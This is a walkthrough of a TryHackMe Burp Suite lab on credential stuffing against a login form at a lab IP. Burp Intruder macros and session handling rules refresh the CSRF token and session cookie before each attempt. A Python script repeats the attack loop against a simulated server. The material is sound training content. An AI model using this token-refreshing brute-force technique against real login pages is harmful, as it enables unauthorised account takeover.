Setting up a Macro for Intruder

These notes cover a credential-stuffing attack with Burp Suite's Intruder against a login form whose CSRF token and session cookie change on every request. Because a plain Intruder attack would replay stale values and be rejected, a Macro combined with a Session Handling Rule fetches fresh values before each attempt. The steps are:

Setting Up the Request Capture:

  1. Start by capturing a login request to http://10.10.129.2/admin/login/.

  2. Note the response: the session cookie and the CSRF token (the loginToken form field) are dynamic and change on every request, which is why the rest of this setup is needed.

Configuring the Intruder:

  1. Send the captured login request from the Proxy history to Intruder.

  2. In Intruder, set up the attack:

    • Use the "Pitchfork" attack type.

    • Clear the auto-selected positions and mark only the username and password values as payload positions; leave the session cookie and the loginToken untouched, since the session handling rule will rewrite them.

Loading Payloads:

  1. Go to the Payloads tab in Intruder.

  2. Load the username wordlist as payload set 1 and the password wordlist as payload set 2 (Pitchfork submits line N of each list together).

Setting Up the Macro:

  1. Navigate to the "Settings" tab and select "Sessions".

  2. Under "Macros," add a new macro.

    • Choose a GET request to http://10.10.129.2/admin/login/ from your Proxy history; replaying it returns a fresh session cookie and a fresh loginToken.

    • Name the macro appropriately.

Configuring Session Handling Rules:

  1. Under "Session Handling Rules," add a new rule.

  2. In the Scope tab:

    • Under Tools scope, enable the rule only for Intruder.

    • Set URL scope to "Use suite scope" or define a custom scope for http://10.10.129.2/.

  3. In the Details tab, under "Rule Actions":

    • Add the "Run a Macro" action.

    • Select the macro you created.

    • In the macro options, choose to update only the "loginToken" parameter and only the "session" cookie, rather than every parameter and cookie in the request.

Launching the Attack:

  1. Return to Intruder and start the attack.

  2. Watch the status codes: a 302 redirect is what a successful login returns, while a run of 403 responses means the CSRF token or session cookie is being rejected, i.e. the macro is not updating them.

  3. Sort the results by response length; the successful attempt should stand out as notably shorter than the failed ones.
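The procedure above, recreated in Python as an added example (this is not part of the TryHackMe lab or the original page): every attempt first replays the macro's GET, extracts the fresh loginToken and session cookie from it, then POSTs one username/password pair in Pitchfork order. FakeLoginServer is a constructed stand-in for http://10.10.129.2/admin/login/ that behaves the way the lab text describes (403 on a stale token, 200 on bad credentials, 302 on success); against the real target you would replace it with a requests.Session, and the field names loginToken, username and password are assumed to match the form.

```python
import re
import secrets

# The hidden CSRF field is assumed to be rendered as name="loginToken" value="...".
TOKEN_RE = re.compile(r'name="loginToken"\s+value="([^"]+)"')


def extract_login_token(html):
    """Return the loginToken value from the login form HTML, or None if absent."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


class FakeLoginServer:
    """Constructed stand-in for the lab's /admin/login/ endpoint (not the real app).

    Every GET issues a new session cookie plus a CSRF token bound to it; a POST
    whose loginToken does not match the token issued to that session gets 403;
    wrong credentials get 200 with the form re-rendered (and a new token); the
    valid pair gets an empty 302 redirect.
    """

    def __init__(self, valid_username, valid_password):
        self.valid = (valid_username, valid_password)
        self.tokens = {}  # session cookie value -> loginToken it may use

    def _form(self, token):
        return (
            '<form method="post" action="/admin/login/">'
            f'<input type="hidden" name="loginToken" value="{token}">'
            '<input name="username"><input name="password"></form>'
        )

    def get(self):
        session = secrets.token_hex(8)
        token = secrets.token_hex(16)
        self.tokens[session] = token
        return 200, {"session": session}, self._form(token)

    def post(self, cookies, data):
        expected = self.tokens.pop(cookies.get("session"), None)  # tokens are single-use
        if expected is None or data.get("loginToken") != expected:
            return 403, {}, "Forbidden: invalid CSRF token"
        if (data.get("username"), data.get("password")) == self.valid:
            return 302, {"Location": "/admin/"}, ""
        new_token = secrets.token_hex(16)
        self.tokens[cookies["session"]] = new_token
        return 200, {}, "<p>Invalid username or password.</p>" + self._form(new_token)


def pitchfork_attack(server, usernames, passwords, run_macro=True):
    """Submit usernames[i]/passwords[i] pairs (Burp Pitchfork) and return
    (username, password, status, body_length) for each attempt.

    run_macro=True is the session handling rule: a fresh GET before every POST
    supplies the current session cookie and loginToken. run_macro=False replays
    the values captured once, which is exactly what produces the 403s the lab
    warns about.
    """
    _, cookies, html = server.get()          # the originally captured request
    token = extract_login_token(html)
    results = []
    for username, password in zip(usernames, passwords):
        if run_macro:
            _, cookies, html = server.get()  # macro: re-fetch the login page
            token = extract_login_token(html)
        status, _, body = server.post(
            cookies, {"username": username, "password": password, "loginToken": token}
        )
        results.append((username, password, status, len(body)))
    return results


def successful_logins(results):
    """Credentials whose attempt produced the 302 redirect."""
    return [(u, p) for u, p, status, _ in results if status == 302]


if __name__ == "__main__":
    # Constructed wordlists; line i of each list is tried together.
    users = ["alice", "bob", "admin", "carol"]
    words = ["password1", "letmein", "Summer2023!", "qwerty"]
    for row in pitchfork_attack(FakeLoginServer("admin", "Summer2023!"), users, words):
        print(row)
```

Running it shows the two signals the lab tells you to watch for: the valid pair is the only 302 and has the shortest body, and switching run_macro to False turns every attempt after the first into a 403, because the replayed loginToken no longer matches the one bound to the session.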

Credit: this lab comes from TryHackMe's Burp Suite: Intruder room, Task 12: The Extra Mile.
